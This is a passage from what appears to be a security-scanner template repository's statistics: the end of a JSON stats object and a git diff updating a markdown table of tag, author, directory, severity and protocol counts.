sherif","count":1},{"name":"aresx","count":1},{"name":"ldionmarcil","count":1},{"name":"mah3sec_","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ajaysenr","count":1},{"name":"thevillagehacker","count":1},{"name":"alph4byt3","count":1},{"name":"furkansenan","count":1},{"name":"c3l3si4n","count":1},{"name":"un-fmunozs","count":1},{"name":"akshansh","count":1},{"name":"borna nematzadeh","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"udyz","count":1},{"name":"kurohost","count":1},{"name":"s1r1u5_","count":1},{"name":"yashgoti","count":1},{"name":"cookiehanhoan","count":1},{"name":"iampritam","count":1},{"name":"retr0","count":1},{"name":"elder tao","count":1},{"name":"pudsec","count":1},{"name":"sy3omda","count":1},{"name":"naglinagli","count":1},{"name":"micha3lb3n","count":1},{"name":"exploitation","count":1},{"name":"dawid-czarnecki","count":1},{"name":"taielab","count":1},{"name":"oscarintherocks","count":1},{"name":"brabbit10","count":1},{"name":"akash.c","count":1},{"name":"co0nan","count":1},{"name":"alperenkesk","count":1},{"name":"soyelmago","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"fmunozs","count":1},{"name":"jteles","count":1},{"name":"luskabol","count":1},{"name":"elmahdi","count":1},{"name":"infosecsanyam","count":1},{"name":"j33n1k4","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"me9187","count":1},{"name":"schniggie","count":1},{"name":"nerrorsec","count":1},{"name":"toufik airane","count":1},{"name":"streetofhackerr007","count":1},{"name":"remonsec","count":1},{"name":"notsoevilweasel","count":1},{"name":"zhenwarx","count":1},{"name":"b0rn2r00t","count":1},{"name":"x6263","count":1},{"name":"qlkwej","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"philippdelteil","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"patralos","count":1},{"name":"whynotke","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"absshax","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"adrianmf","count":1},{"name":"tirtha_mandal","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"shreyapohekar","count":1},{"name":"xstp","count":1},{"name":"ooooooo_q","count":1},{"name":"bad5ect0r","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"its0x08","count":1},{"name":"pratik khalane","count":1},{"name":"revblock","count":1},{"name":"kre80r","count":1},{"name":"0h1in9e","count":1},{"name":"andysvints","count":1},{"name":"bolli95","count":1},{"name":"hakluke","count":1},{"name":"becivells","count":1},{"name":"pdp","count":1},{"name":"vzamanillo","count":1},{"name":"blckraven","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"mass0ma","count":1},{"name":"_darrenmartyn","count":1},{"name":"andirrahmani1","count":1},{"name":"mubassirpatel","count":1},{"name":"knassar702","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"th3.d1p4k","count":1},{"name":"makyotox","count":1},{"name":"shelld3v","count":1},{"name":"mesaglio","count":1},{"name":"0xteles","count":1},{"name":"sshell","count":1},{"name":"zandros0","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"noamrathaus","count":1},{"name":"petruknisme","count":1},{"name":"0ut0fb4nd","count":1},{"name":"kabirsuda","count":1},{"name":"izn0u","count":1},{"name":"chron0x","count":1},{"name":"manuelbua","count":1},{"name":"ilovebinbash","count":1},{"name":"ohlinge","count":1},{"name":"undefl0w","count":1},{"name":"thezakman","count":1},{"name":"intx0x80","count":1},{"name":"tim_koopmans","count":1},{"name":"luci","count":1},{"name":"nytr0gen","count":1},{"name":"daviey","count":1},{"name":"deena","count":1},{"name":"gboddin","count":1},{"name":"smaranchand","count":1},{"name":"sickwell","count":1},{"name":"yavolo","count":1},{"name":"rotemreiss","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"evolutionsec","count":1},{"name":"b0yd","count":1},{"name":"sicksec","count":1},{"name":"rodnt","count":1},{"name":"push4d","count":1},{"name":"divya_mudgal","count":1},{"name":"raesene","count":1},{"name":"b4uh0lz","count":1},{"name":"juicypotato1","count":1},{"name":"d0rkerdevil","count":1},{"name":"52971","count":1},{"name":"geraldino2","count":1},{"name":"sec_hawk","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"wabafet","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1}],"directory":[{"name":"cves","count":803},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":250},{"name":"technologies","count":199},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":34},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":660},{"name":"high","count":620},{"name":"medium","count":463},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":2067},{"name":"file","count":46},{"name":"network","count":43},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 909552d84f..aae0af0a71 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,14 +1,14 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | -| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 660 | http | 2067 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 312 | high | 620 | file | 46 | | xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| panel | 252 | pdteam | 199 | technologies | 199 | critical | 276 | dns | 12 | | wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | | exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| tech | 190 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | | cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | | cve2021 | 139 | 0x_akoko | 43 | network | 34 | | | | | | joomla | 128 | gaurang | 42 | iot | 25 | | | | | @@ -16,813 +16,814 @@ | cve2019 | 96 | ice3man | 26 | dns | 12 | | | | | | config | 94 | organiccrap | 24 | fuzzing | 10 | | | | | | cve2018 | 86 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 70 | pr3r00t | 14 | headless | 5 | | | | | -| takeover | 68 | milo2012 | 14 | | | | | | | +| apache | 70 | milo2012 | 14 | headless | 5 | | | | | +| takeover | 68 | pr3r00t | 14 | | | | | | | | iot | 66 | techbrunchfr | 13 | | | | | | | | token | 65 | suman_kar | 12 | | | | | | | -| default-login | 64 | r3dg33k | 11 | | | | | | | -| oob | 57 | cyllective | 11 | | | | | | | +| default-login | 64 | cyllective | 11 | | | | | | | +| oob | 57 | r3dg33k | 11 | | | | | | | | cve2017 | 50 | random_robbie | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| network | 43 | hackergautam | 9 | | | | | | | -| ssrf | 40 | nadino | 9 | | | | | | | -| sqli | 38 | melbadry9 | 9 | | | | | | | -| | 37 | iamthefrogy | 8 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | +| unauth | 47 | righettod | 10 | | | | | | | +| file | 46 | wdahlenb | 10 | | | | | | | +| network | 43 | nadino | 9 | | | | | | | +| ssrf | 40 | melbadry9 | 9 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | | cve2016 | 36 | aashiq | 8 | | | | | | | -| redirect | 34 | oppsec | 7 | | | | | | | -| logs | 30 | 0x240x23elu | 7 | | | | | | | -| jira | 28 | dogasantos | 7 | | | | | | | -| atlassian | 27 | harshbothra_ | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | +| redirect | 34 | 0x240x23elu | 7 | | | | | | | +| logs | 30 | harshbothra_ | 7 | | | | | | | +| jira | 28 | dr_set | 7 | | | | | | | | cve2014 | 27 | emadshanab | 7 | | | | | | | +| atlassian | 27 | kophjager007 | 7 | | | | | | | +| listing | 27 | meme-lord | 7 | | | | | | | | cve2015 | 26 | randomstr1ng | 7 | | | | | | | -| generic | 23 | techryptic (@tech) | 7 | | | | | | | -| auth-bypass | 23 | dr_set | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 22 | logicalhunter | 6 | | | | | | | -| router | 20 | __fazal | 6 | | | | | | | -| aem | 19 | pentest_swissky | 6 | | | | | | | +| generic | 23 | oppsec | 7 | | | | | | | +| auth-bypass | 23 | techryptic (@tech) | 7 | | | | | | | +| misc | 23 | dogasantos | 7 | | | | | | | +| disclosure | 22 | pentest_swissky | 6 | | | | | | | +| router | 20 | caspergn | 6 | | | | | | | | cisco | 19 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | caspergn | 6 | | | | | | | -| debug | 18 | panch0r3d | 5 | | | | | | | -| misconfig | 18 | elsfa7110 | 5 | | | | | | | -| sap | 18 | yanyun | 5 | | | | | | | -| cve2012 | 17 | lu4nx | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | -| cve2011 | 15 | ganofins | 5 | | | | | | | -| login | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | iamnoooob | 5 | | | | | | | +| aem | 19 | logicalhunter | 6 | | | | | | | +| misconfig | 18 | __fazal | 6 | | | | | | | +| debug | 18 | yanyun | 5 | | | | | | | +| springboot | 18 | ganofins | 5 | | | | | | | +| sap | 18 | panch0r3d | 5 | | | | | | | +| cve2012 | 17 | elsfa7110 | 5 | | | | | | | +| php | 16 | iamnoooob | 5 | | | | | | | +| cve2011 | 15 | rootxharsh | 5 | | | | | | | +| fuzz | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | nodauf | 4 | | | | | | | +| login | 14 | xelkomy | 4 | | | | | | | | weblogic | 14 | e_schultze_ | 4 | | | | | | | -| fuzz | 14 | nodauf | 4 | | | | | | | -| struts | 14 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | xelkomy | 4 | | | | | | | -| adobe | 13 | shine | 3 | | | | | | | -| devops | 13 | unstabl3 | 3 | | | | | | | -| zoho | 13 | 0w4ys | 3 | | | | | | | -| dns | 13 | emenalf | 3 | | | | | | | -| dlink | 12 | sushantkamble | 3 | | | | | | | -| aws | 12 | tess | 3 | | | | | | | -| jenkins | 12 | f1tz | 3 | | | | | | | -| manageengine | 12 | johnk3r | 3 | | | | | | | -| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | -| wp-theme | 11 | z3bd | 3 | | | | | | | -| dell | 10 | incogbyte | 3 | | | | | | | -| xxe | 10 | jarijaas | 3 | | | | | | | -| intrusive | 9 | dudez | 3 | | | | | | | -| ftp | 9 | skeltavik | 3 | | | | | | | -| magento | 9 | impramodsargar | 3 | | | | | | | -| vmware | 9 | idealphase | 3 | | | | | | | -| cve2008 | 8 | shifacyclewala | 3 | | | | | | | -| scada | 8 | mavericknerd | 3 | | | | | | | -| nginx | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | vsh00t | 3 | | | | | | | -| airflow | 8 | binaryfigments | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| gitlab | 8 | _generic_human_ | 3 | | | | | | | -| ruijie | 8 | 0xcrypto | 2 | | | | | | | -| google | 7 | davidmckennirey | 2 | | | | | | | -| ibm | 7 | bing0o | 2 | | | | | | | -| backup | 7 | zomsop82 | 2 | | | | | | | -| kubernetes | 7 | 0xrudra | 2 | | | | | | | -| netgear | 7 | dheerajmadhukar | 2 | | | | | | | -| microsoft | 7 | hetroublemakr | 2 | | | | | | | +| dns | 13 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | f1tz | 3 | | | | | | | +| zoho | 13 | shifacyclewala | 3 | | | | | | | +| adobe | 13 | fyoorer | 3 | | | | | | | +| devops | 13 | sushantkamble | 3 | | | | | | | +| dlink | 12 | incogbyte | 3 | | | | | | | +| jenkins | 12 | johnk3r | 3 | | | | | | | +| manageengine | 12 | _generic_human_ | 3 | | | | | | | +| aws | 12 | z3bd | 3 | | | | | | | +| cve2013 | 11 | 0w4ys | 3 | | | | | | | +| wp-theme | 11 | dudez | 3 | | | | | | | +| xxe | 10 | thomas_from_offensity | 3 | | | | | | | +| dell | 10 | binaryfigments | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| intrusive | 9 | skeltavik | 3 | | | | | | | +| ftp | 9 | impramodsargar | 3 | | | | | | | +| vmware | 9 | yash anand @yashanand155 | 3 | | | | | | | +| nginx | 8 | unstabl3 | 3 | | | | | | | +| cve2008 | 8 | vsh00t | 3 | | | | | | | +| gitlab | 8 | emenalf | 3 | | | | | | | +| rails | 8 | shine | 3 | | | | | | | +| airflow | 8 | idealphase | 3 | | | | | | | +| ruijie | 8 | mavericknerd | 3 | | | | | | | +| scada | 8 | jarijaas | 3 | | | | | | | +| cnvd | 8 | randomrobbie | 2 | | | | | | | +| confluence | 7 | moritz nentwig | 2 | | | | | | | +| cms | 7 | g4l1t0 | 2 | | | | | | | | coldfusion | 7 | bsysop | 2 | | | | | | | -| confluence | 7 | alifathi-h1 | 2 | | | | | | | -| files | 7 | johnjhacking | 2 | | | | | | | -| cms | 7 | randomrobbie | 2 | | | | | | | -| camera | 6 | kiblyn11 | 2 | | | | | | | -| docker | 6 | afaq | 2 | | | | | | | -| citrix | 6 | udit_thakkur | 2 | | | | | | | -| api | 6 | lotusdll | 2 | | | | | | | -| laravel | 6 | vavkamil | 2 | | | | | | | -| hp | 6 | convisoappsec | 2 | | | | | | | -| solr | 6 | mohammedsaneem | 2 | | | | | | | -| jetty | 6 | 0xprial | 2 | | | | | | | -| django | 6 | gevakun | 2 | | | | | | | -| rconfig | 6 | bp0lr | 2 | | | | | | | -| java | 5 | ree4pwn | 2 | | | | | | | -| headless | 5 | cocxanh | 2 | | | | | | | -| lucee | 5 | g4l1t0 | 2 | | | | | | | -| windows | 5 | fabaff | 2 | | | | | | | -| printer | 5 | arcc | 2 | | | | | | | -| fileupload | 5 | whoever | 2 | | | | | | | -| iis | 5 | bernardofsr | 2 | | | | | | | -| ssti | 5 | nkxxkn | 2 | | | | | | | -| dedecms | 5 | parth | 2 | | | | | | | -| deserialization | 5 | random-robbie | 2 | | | | | | | -| drupal | 5 | pxmme1337 | 2 | | | | | | | -| phpmyadmin | 5 | 0xsmiley | 2 | | | | | | | -| tomcat | 5 | amsda | 2 | | | | | | | -| circarlife | 5 | 0xsapra | 2 | | | | | | | -| jolokia | 5 | ehsahil | 2 | | | | | | | -| nodejs | 5 | x1m_martijn | 2 | | | | | | | -| thinkphp | 4 | socketz | 2 | | | | | | | -| symfony | 4 | manas_harsh | 2 | | | | | | | -| zabbix | 4 | foulenzer | 2 | | | | | | | -| wso2 | 4 | swissky | 2 | | | | | | | -| resin | 4 | koti2 | 2 | | | | | | | -| solarwinds | 4 | huowuzhao | 2 | | | | | | | -| symantec | 4 | 0xelkomy | 2 | | | | | | | -| moodle | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| thinkcmf | 4 | joeldeleep | 2 | | | | | | | -| crlf | 4 | r3naissance | 2 | | | | | | | -| strapi | 4 | gal nagli | 2 | | | | | | | -| artifactory | 4 | w4cky_ | 2 | | | | | | | -| webserver | 4 | moritz nentwig | 2 | | | | | | | -| proxy | 4 | hahwul | 2 | | | | | | | -| glpi | 4 | kre80r | 1 | | | | | | | -| asp | 4 | shreyapohekar | 1 | | | | | | | -| zimbra | 4 | andysvints | 1 | | | | | | | -| elastic | 4 | retr0 | 1 | | | | | | | -| rfi | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| traversal | 4 | pdp | 1 | | | | | | | -| grafana | 4 | hakluke | 1 | | | | | | | -| git | 4 | deena | 1 | | | | | | | -| magmi | 4 | flag007 | 1 | | | | | | | -| firmware | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| samsung | 4 | absshax | 1 | | | | | | | -| hongdian | 4 | sec_hawk | 1 | | | | | | | -| exchange | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| vpn | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| ibm | 7 | hetroublemakr | 2 | | | | | | | +| netgear | 7 | huowuzhao | 2 | | | | | | | +| files | 7 | dheerajmadhukar | 2 | | | | | | | +| google | 7 | 0xcrypto | 2 | | | | | | | +| backup | 7 | random-robbie | 2 | | | | | | | +| microsoft | 7 | nkxxkn | 2 | | | | | | | +| kubernetes | 7 | r3naissance | 2 | | | | | | | +| laravel | 6 | udit_thakkur | 2 | | | | | | | +| camera | 6 | joeldeleep | 2 | | | | | | | +| solr | 6 | 0xsmiley | 2 | | | | | | | +| hp | 6 | lotusdll | 2 | | | | | | | +| jetty | 6 | w4cky_ | 2 | | | | | | | +| docker | 6 | ehsahil | 2 | | | | | | | +| api | 6 | johnjhacking | 2 | | | | | | | +| rconfig | 6 | foulenzer | 2 | | | | | | | +| django | 6 | manas_harsh | 2 | | | | | | | +| citrix | 6 | 0xsapra | 2 | | | | | | | +| deserialization | 5 | davidmckennirey | 2 | | | | | | | +| iis | 5 | socketz | 2 | | | | | | | +| windows | 5 | hahwul | 2 | | | | | | | +| lucee | 5 | gal nagli | 2 | | | | | | | +| drupal | 5 | afaq | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| circarlife | 5 | x1m_martijn | 2 | | | | | | | +| ssti | 5 | pxmme1337 | 2 | | | | | | | +| dedecms | 5 | bp0lr | 2 | | | | | | | +| fileupload | 5 | arcc | 2 | | | | | | | +| jolokia | 5 | convisoappsec | 2 | | | | | | | +| headless | 5 | parth | 2 | | | | | | | +| nodejs | 5 | 0xprial | 2 | | | | | | | +| tomcat | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| printer | 5 | bernardofsr | 2 | | | | | | | +| java | 5 | alifathi-h1 | 2 | | | | | | | +| elastic | 4 | swissky | 2 | | | | | | | +| solarwinds | 4 | fabaff | 2 | | | | | | | +| samsung | 4 | whoever | 2 | | | | | | | +| hongdian | 4 | amsda | 2 | | | | | | | +| vpn | 4 | koti2 | 2 | | | | | | | +| firmware | 4 | bing0o | 2 | | | | | | | +| buffalo | 4 | cocxanh | 2 | | | | | | | +| grafana | 4 | vavkamil | 2 | | | | | | | +| moodle | 4 | gevakun | 2 | | | | | | | +| fatpipe | 4 | 0xrudra | 2 | | | | | | | +| webserver | 4 | ree4pwn | 2 | | | | | | | +| git | 4 | mohammedsaneem | 2 | | | | | | | +| artifactory | 4 | zomsop82 | 2 | | | | | | | +| symfony | 4 | 0xelkomy | 2 | | | | | | | +| zimbra | 4 | ratnadip gajbhiye | 1 | | | | | | | +| traversal | 4 | thevillagehacker | 1 | | | | | | | +| symantec | 4 | _darrenmartyn | 1 | | | | | | | +| magmi | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| proxy | 4 | defr0ggy | 1 | | | | | | | +| asp | 4 | aresx | 1 | | | | | | | +| wso2 | 4 | elouhi | 1 | | | | | | | +| thinkphp | 4 | @github.com/defr0ggy | 1 | | | | | | | +| crlf | 4 | soyelmago | 1 | | | | | | | +| thinkcmf | 4 | j33n1k4 | 1 | | | | | | | +| strapi | 4 | luskabol | 1 | | | | | | | +| glpi | 4 | ajaysenr | 1 | | | | | | | +| rfi | 4 | retr0 | 1 | | | | | | | +| resin | 4 | sshell | 1 | | | | | | | +| exchange | 4 | ooooooo_q | 1 | | | | | | | +| zabbix | 4 | smaranchand | 1 | | | | | | | +| itop | 3 | tirtha_mandal | 1 | | | | | | | +| oa | 3 | 0xteles | 1 | | | | | | | +| caucho | 3 | affix | 1 | | | | | | | +| springcloud | 3 | x6263 | 1 | | | | | | | +| httpd | 3 | sec_hawk | 1 | | | | | | | +| linkerd | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| openssh | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| buffalo | 4 | b4uh0lz | 1 | | | | | | | -| nosqli | 3 | tim_koopmans | 1 | | | | | | | -| tikiwiki | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | becivells | 1 | | | | | | | -| itop | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| ebs | 3 | _darrenmartyn | 1 | | | | | | | -| firebase | 3 | whynotke | 1 | | | | | | | -| druid | 3 | shifacyclewla | 1 | | | | | | | -| openssh | 3 | ringo | 1 | | | | | | | -| kibana | 3 | aresx | 1 | | | | | | | -| azure | 3 | affix | 1 | | | | | | | -| microstrategy | 3 | ipanda | 1 | | | | | | | -| jeesns | 3 | @dwisiswant0 | 1 | | | | | | | -| nexus | 3 | petruknisme | 1 | | | | | | | -| zhiyuan | 3 | _harleo | 1 | | | | | | | -| mail | 3 | ratnadip gajbhiye | 1 | | | | | | | -| targa | 3 | thezakman | 1 | | | | | | | -| terramaster | 3 | notsoevilweasel | 1 | | | | | | | -| injection | 3 | alperenkesk | 1 | | | | | | | -| ssh | 3 | mesaglio | 1 | | | | | | | -| linkerd | 3 | yashgoti | 1 | | | | | | | -| mongodb | 3 | c3l3si4n | 1 | | | | | | | -| nacos | 3 | elder tao | 1 | | | | | | | -| telerik | 3 | 52971 | 1 | | | | | | | -| oa | 3 | ahmetpergamum | 1 | | | | | | | -| httpd | 3 | un-fmunozs | 1 | | | | | | | -| fatpipe | 3 | zandros0 | 1 | | | | | | | -| caucho | 3 | zhenwarx | 1 | | | | | | | -| bigip | 3 | streetofhackerr007 | 1 | | | | | | | -| cve2007 | 3 | defr0ggy | 1 | | | | | | | -| bitrix | 3 | push4d | 1 | | | | | | | -| jellyfin | 3 | cookiehanhoan | 1 | | | | | | | -| fpd | 3 | adrianmf | 1 | | | | | | | -| springcloud | 3 | jteles | 1 | | | | | | | -| cacti | 3 | willd96 | 1 | | | | | | | -| log | 3 | yavolo | 1 | | | | | | | -| ofbiz | 3 | x6263 | 1 | | | | | | | -| smtp | 3 | nytr0gen | 1 | | | | | | | -| amazon | 3 | dawid-czarnecki | 1 | | | | | | | -| fanruan | 3 | revblock | 1 | | | | | | | -| prometheus | 3 | udyz | 1 | | | | | | | -| slack | 3 | hanlaomo | 1 | | | | | | | -| hoteldruid | 3 | bad5ect0r | 1 | | | | | | | -| vbulletin | 3 | exploitation | 1 | | | | | | | -| backdoor | 3 | borna nematzadeh | 1 | | | | | | | -| kevinlab | 3 | luskabol | 1 | | | | | | | -| opensis | 3 | taielab | 1 | | | | | | | -| kafka | 3 | 0xtavian | 1 | | | | | | | -| backups | 3 | its0x08 | 1 | | | | | | | -| openam | 3 | soyelmago | 1 | | | | | | | -| npm | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| r-seenet | 3 | rodnt | 1 | | | | | | | -| cve2005 | 2 | j33n1k4 | 1 | | | | | | | -| horde | 2 | wabafet | 1 | | | | | | | -| guacamole | 2 | apt-mirror | 1 | | | | | | | -| bucket | 2 | kareemse1im | 1 | | | | | | | -| sitecore | 2 | kurohost | 1 | | | | | | | -| phpcollab | 2 | mubassirpatel | 1 | | | | | | | -| yii | 2 | fopina | 1 | | | | | | | -| hostheader-injection | 2 | nerrorsec | 1 | | | | | | | -| shellshock | 2 | d0rkerdevil | 1 | | | | | | | -| axis | 2 | juicypotato1 | 1 | | | | | | | -| dolibarr | 2 | noamrathaus | 1 | | | | | | | -| wordfence | 2 | iampritam | 1 | | | | | | | -| ucmdb | 2 | micha3lb3n | 1 | | | | | | | -| saltstack | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| hpe | 2 | infosecsanyam | 1 | | | | | | | -| hjtcloud | 2 | ooooooo_q | 1 | | | | | | | -| github | 2 | mah3sec_ | 1 | | | | | | | -| mida | 2 | andirrahmani1 | 1 | | | | | | | -| hasura | 2 | bernardo rodrigues | 1 | | | | | | | +| jellyfin | 3 | naglinagli | 1 | | | | | | | +| amazon | 3 | 0h1in9e | 1 | | | | | | | +| log | 3 | furkansenan | 1 | | | | | | | +| mongodb | 3 | toufik airane | 1 | | | | | | | +| ebs | 3 | taielab | 1 | | | | | | | +| slack | 3 | ringo | 1 | | | | | | | +| microstrategy | 3 | rojanrijal | 1 | | | | | | | +| lfr | 3 | manuelbua | 1 | | | | | | | +| vbulletin | 3 | ohlinge | 1 | | | | | | | +| opensis | 3 | flag007 | 1 | | | | | | | +| jeesns | 3 | philippdelteil | 1 | | | | | | | +| injection | 3 | mhdsamx | 1 | | | | | | | +| zhiyuan | 3 | ahmed sherif | 1 | | | | | | | +| kibana | 3 | b4uh0lz | 1 | | | | | | | +| npm | 3 | aceseven (digisec360) | 1 | | | | | | | +| bitrix | 3 | berkdusunur | 1 | | | | | | | +| smtp | 3 | infosecsanyam | 1 | | | | | | | +| kafka | 3 | mah3sec_ | 1 | | | | | | | +| openam | 3 | d0rkerdevil | 1 | | | | | | | +| backups | 3 | sicksec | 1 | | | | | | | +| ssh | 3 | cookiehanhoan | 1 | | | | | | | +| cacti | 3 | udyz | 1 | | | | | | | +| ofbiz | 3 | blckraven | 1 | | | | | | | +| bigip | 3 | notsoevilweasel | 1 | | | | | | | +| targa | 3 | @dwisiswant0 | 1 | | | | | | | +| nacos | 3 | _harleo | 1 | | | | | | | +| cve2007 | 3 | pratik khalane | 1 | | | | | | | +| r-seenet | 3 | mesaglio | 1 | | | | | | | +| terramaster | 3 | mubassirpatel | 1 | | | | | | | +| tikiwiki | 3 | chron0x | 1 | | | | | | | +| nosqli | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| prometheus | 3 | luci | 1 | | | | | | | +| azure | 3 | kba@sogeti_esec | 1 | | | | | | | +| hoteldruid | 3 | thezakman | 1 | | | | | | | +| firebase | 3 | andirrahmani1 | 1 | | | | | | | +| nexus | 3 | pudsec | 1 | | | | | | | +| telerik | 3 | juicypotato1 | 1 | | | | | | | +| fpd | 3 | yashanand155 | 1 | | | | | | | +| backdoor | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| tidb | 2 | toufik airane | 1 | | | | | | | -| nagios | 2 | patralos | 1 | | | | | | | -| smb | 2 | undefl0w | 1 | | | | | | | -| icewarp | 2 | sy3omda | 1 | | | | | | | -| jboss | 2 | alph4byt3 | 1 | | | | | | | -| odoo | 2 | ilovebinbash | 1 | | | | | | | -| chamilo | 2 | vzamanillo | 1 | | | | | | | -| qcubed | 2 | me9187 | 1 | | | | | | | -| nextcloud | 2 | pratik khalane | 1 | | | | | | | -| minio | 2 | berkdusunur | 1 | | | | | | | -| seeyon | 2 | makyotox | 1 | | | | | | | -| leak | 2 | sullo | 1 | | | | | | | -| flir | 2 | knassar702 | 1 | | | | | | | -| chyrp | 2 | b0yd | 1 | | | | | | | -| wuzhicms | 2 | ohlinge | 1 | | | | | | | -| ecoa | 2 | daviey | 1 | | | | | | | -| showdoc | 2 | geraldino2 | 1 | | | | | | | -| sonarqube | 2 | fmunozs | 1 | | | | | | | -| harbor | 2 | th3.d1p4k | 1 | | | | | | | -| huawei | 2 | kba@sogeti_esec | 1 | | | | | | | -| pega | 2 | gboddin | 1 | | | | | | | -| rstudio | 2 | mass0ma | 1 | | | | | | | -| trixbox | 2 | philippdelteil | 1 | | | | | | | -| kentico | 2 | ahmed sherif | 1 | | | | | | | -| sonicwall | 2 | oscarintherocks | 1 | | | | | | | -| aruba | 2 | yashanand155 | 1 | | | | | | | -| keycloak | 2 | divya_mudgal | 1 | | | | | | | -| jeedom | 2 | chron0x | 1 | | | | | | | -| splunk | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| chiyu | 2 | ajaysenr | 1 | | | | | | | -| rockmongo | 2 | smaranchand | 1 | | | | | | | -| vrealize | 2 | blckraven | 1 | | | | | | | -| netis | 2 | intx0x80 | 1 | | | | | | | -| voipmonitor | 2 | izn0u | 1 | | | | | | | -| oauth | 2 | qlkwej | 1 | | | | | | | -| dos | 2 | _c0wb0y_ | 1 | | | | | | | -| maian | 2 | brabbit10 | 1 | | | | | | | -| sharepoint | 2 | manuelbua | 1 | | | | | | | -| emerge | 2 | co0nan | 1 | | | | | | | -| fortios | 2 | alex | 1 | | | | | | | -| waf | 2 | akash.c | 1 | | | | | | | -| netsweeper | 2 | rojanrijal | 1 | | | | | | | -| plesk | 2 | @github.com/defr0ggy | 1 | | | | | | | -| storage | 2 | shelld3v | 1 | | | | | | | -| nextjs | 2 | aceseven (digisec360) | 1 | | | | | | | -| spark | 2 | akshansh | 1 | | | | | | | -| hashicorp | 2 | elmahdi | 1 | | | | | | | -| avantfax | 2 | kabirsuda | 1 | | 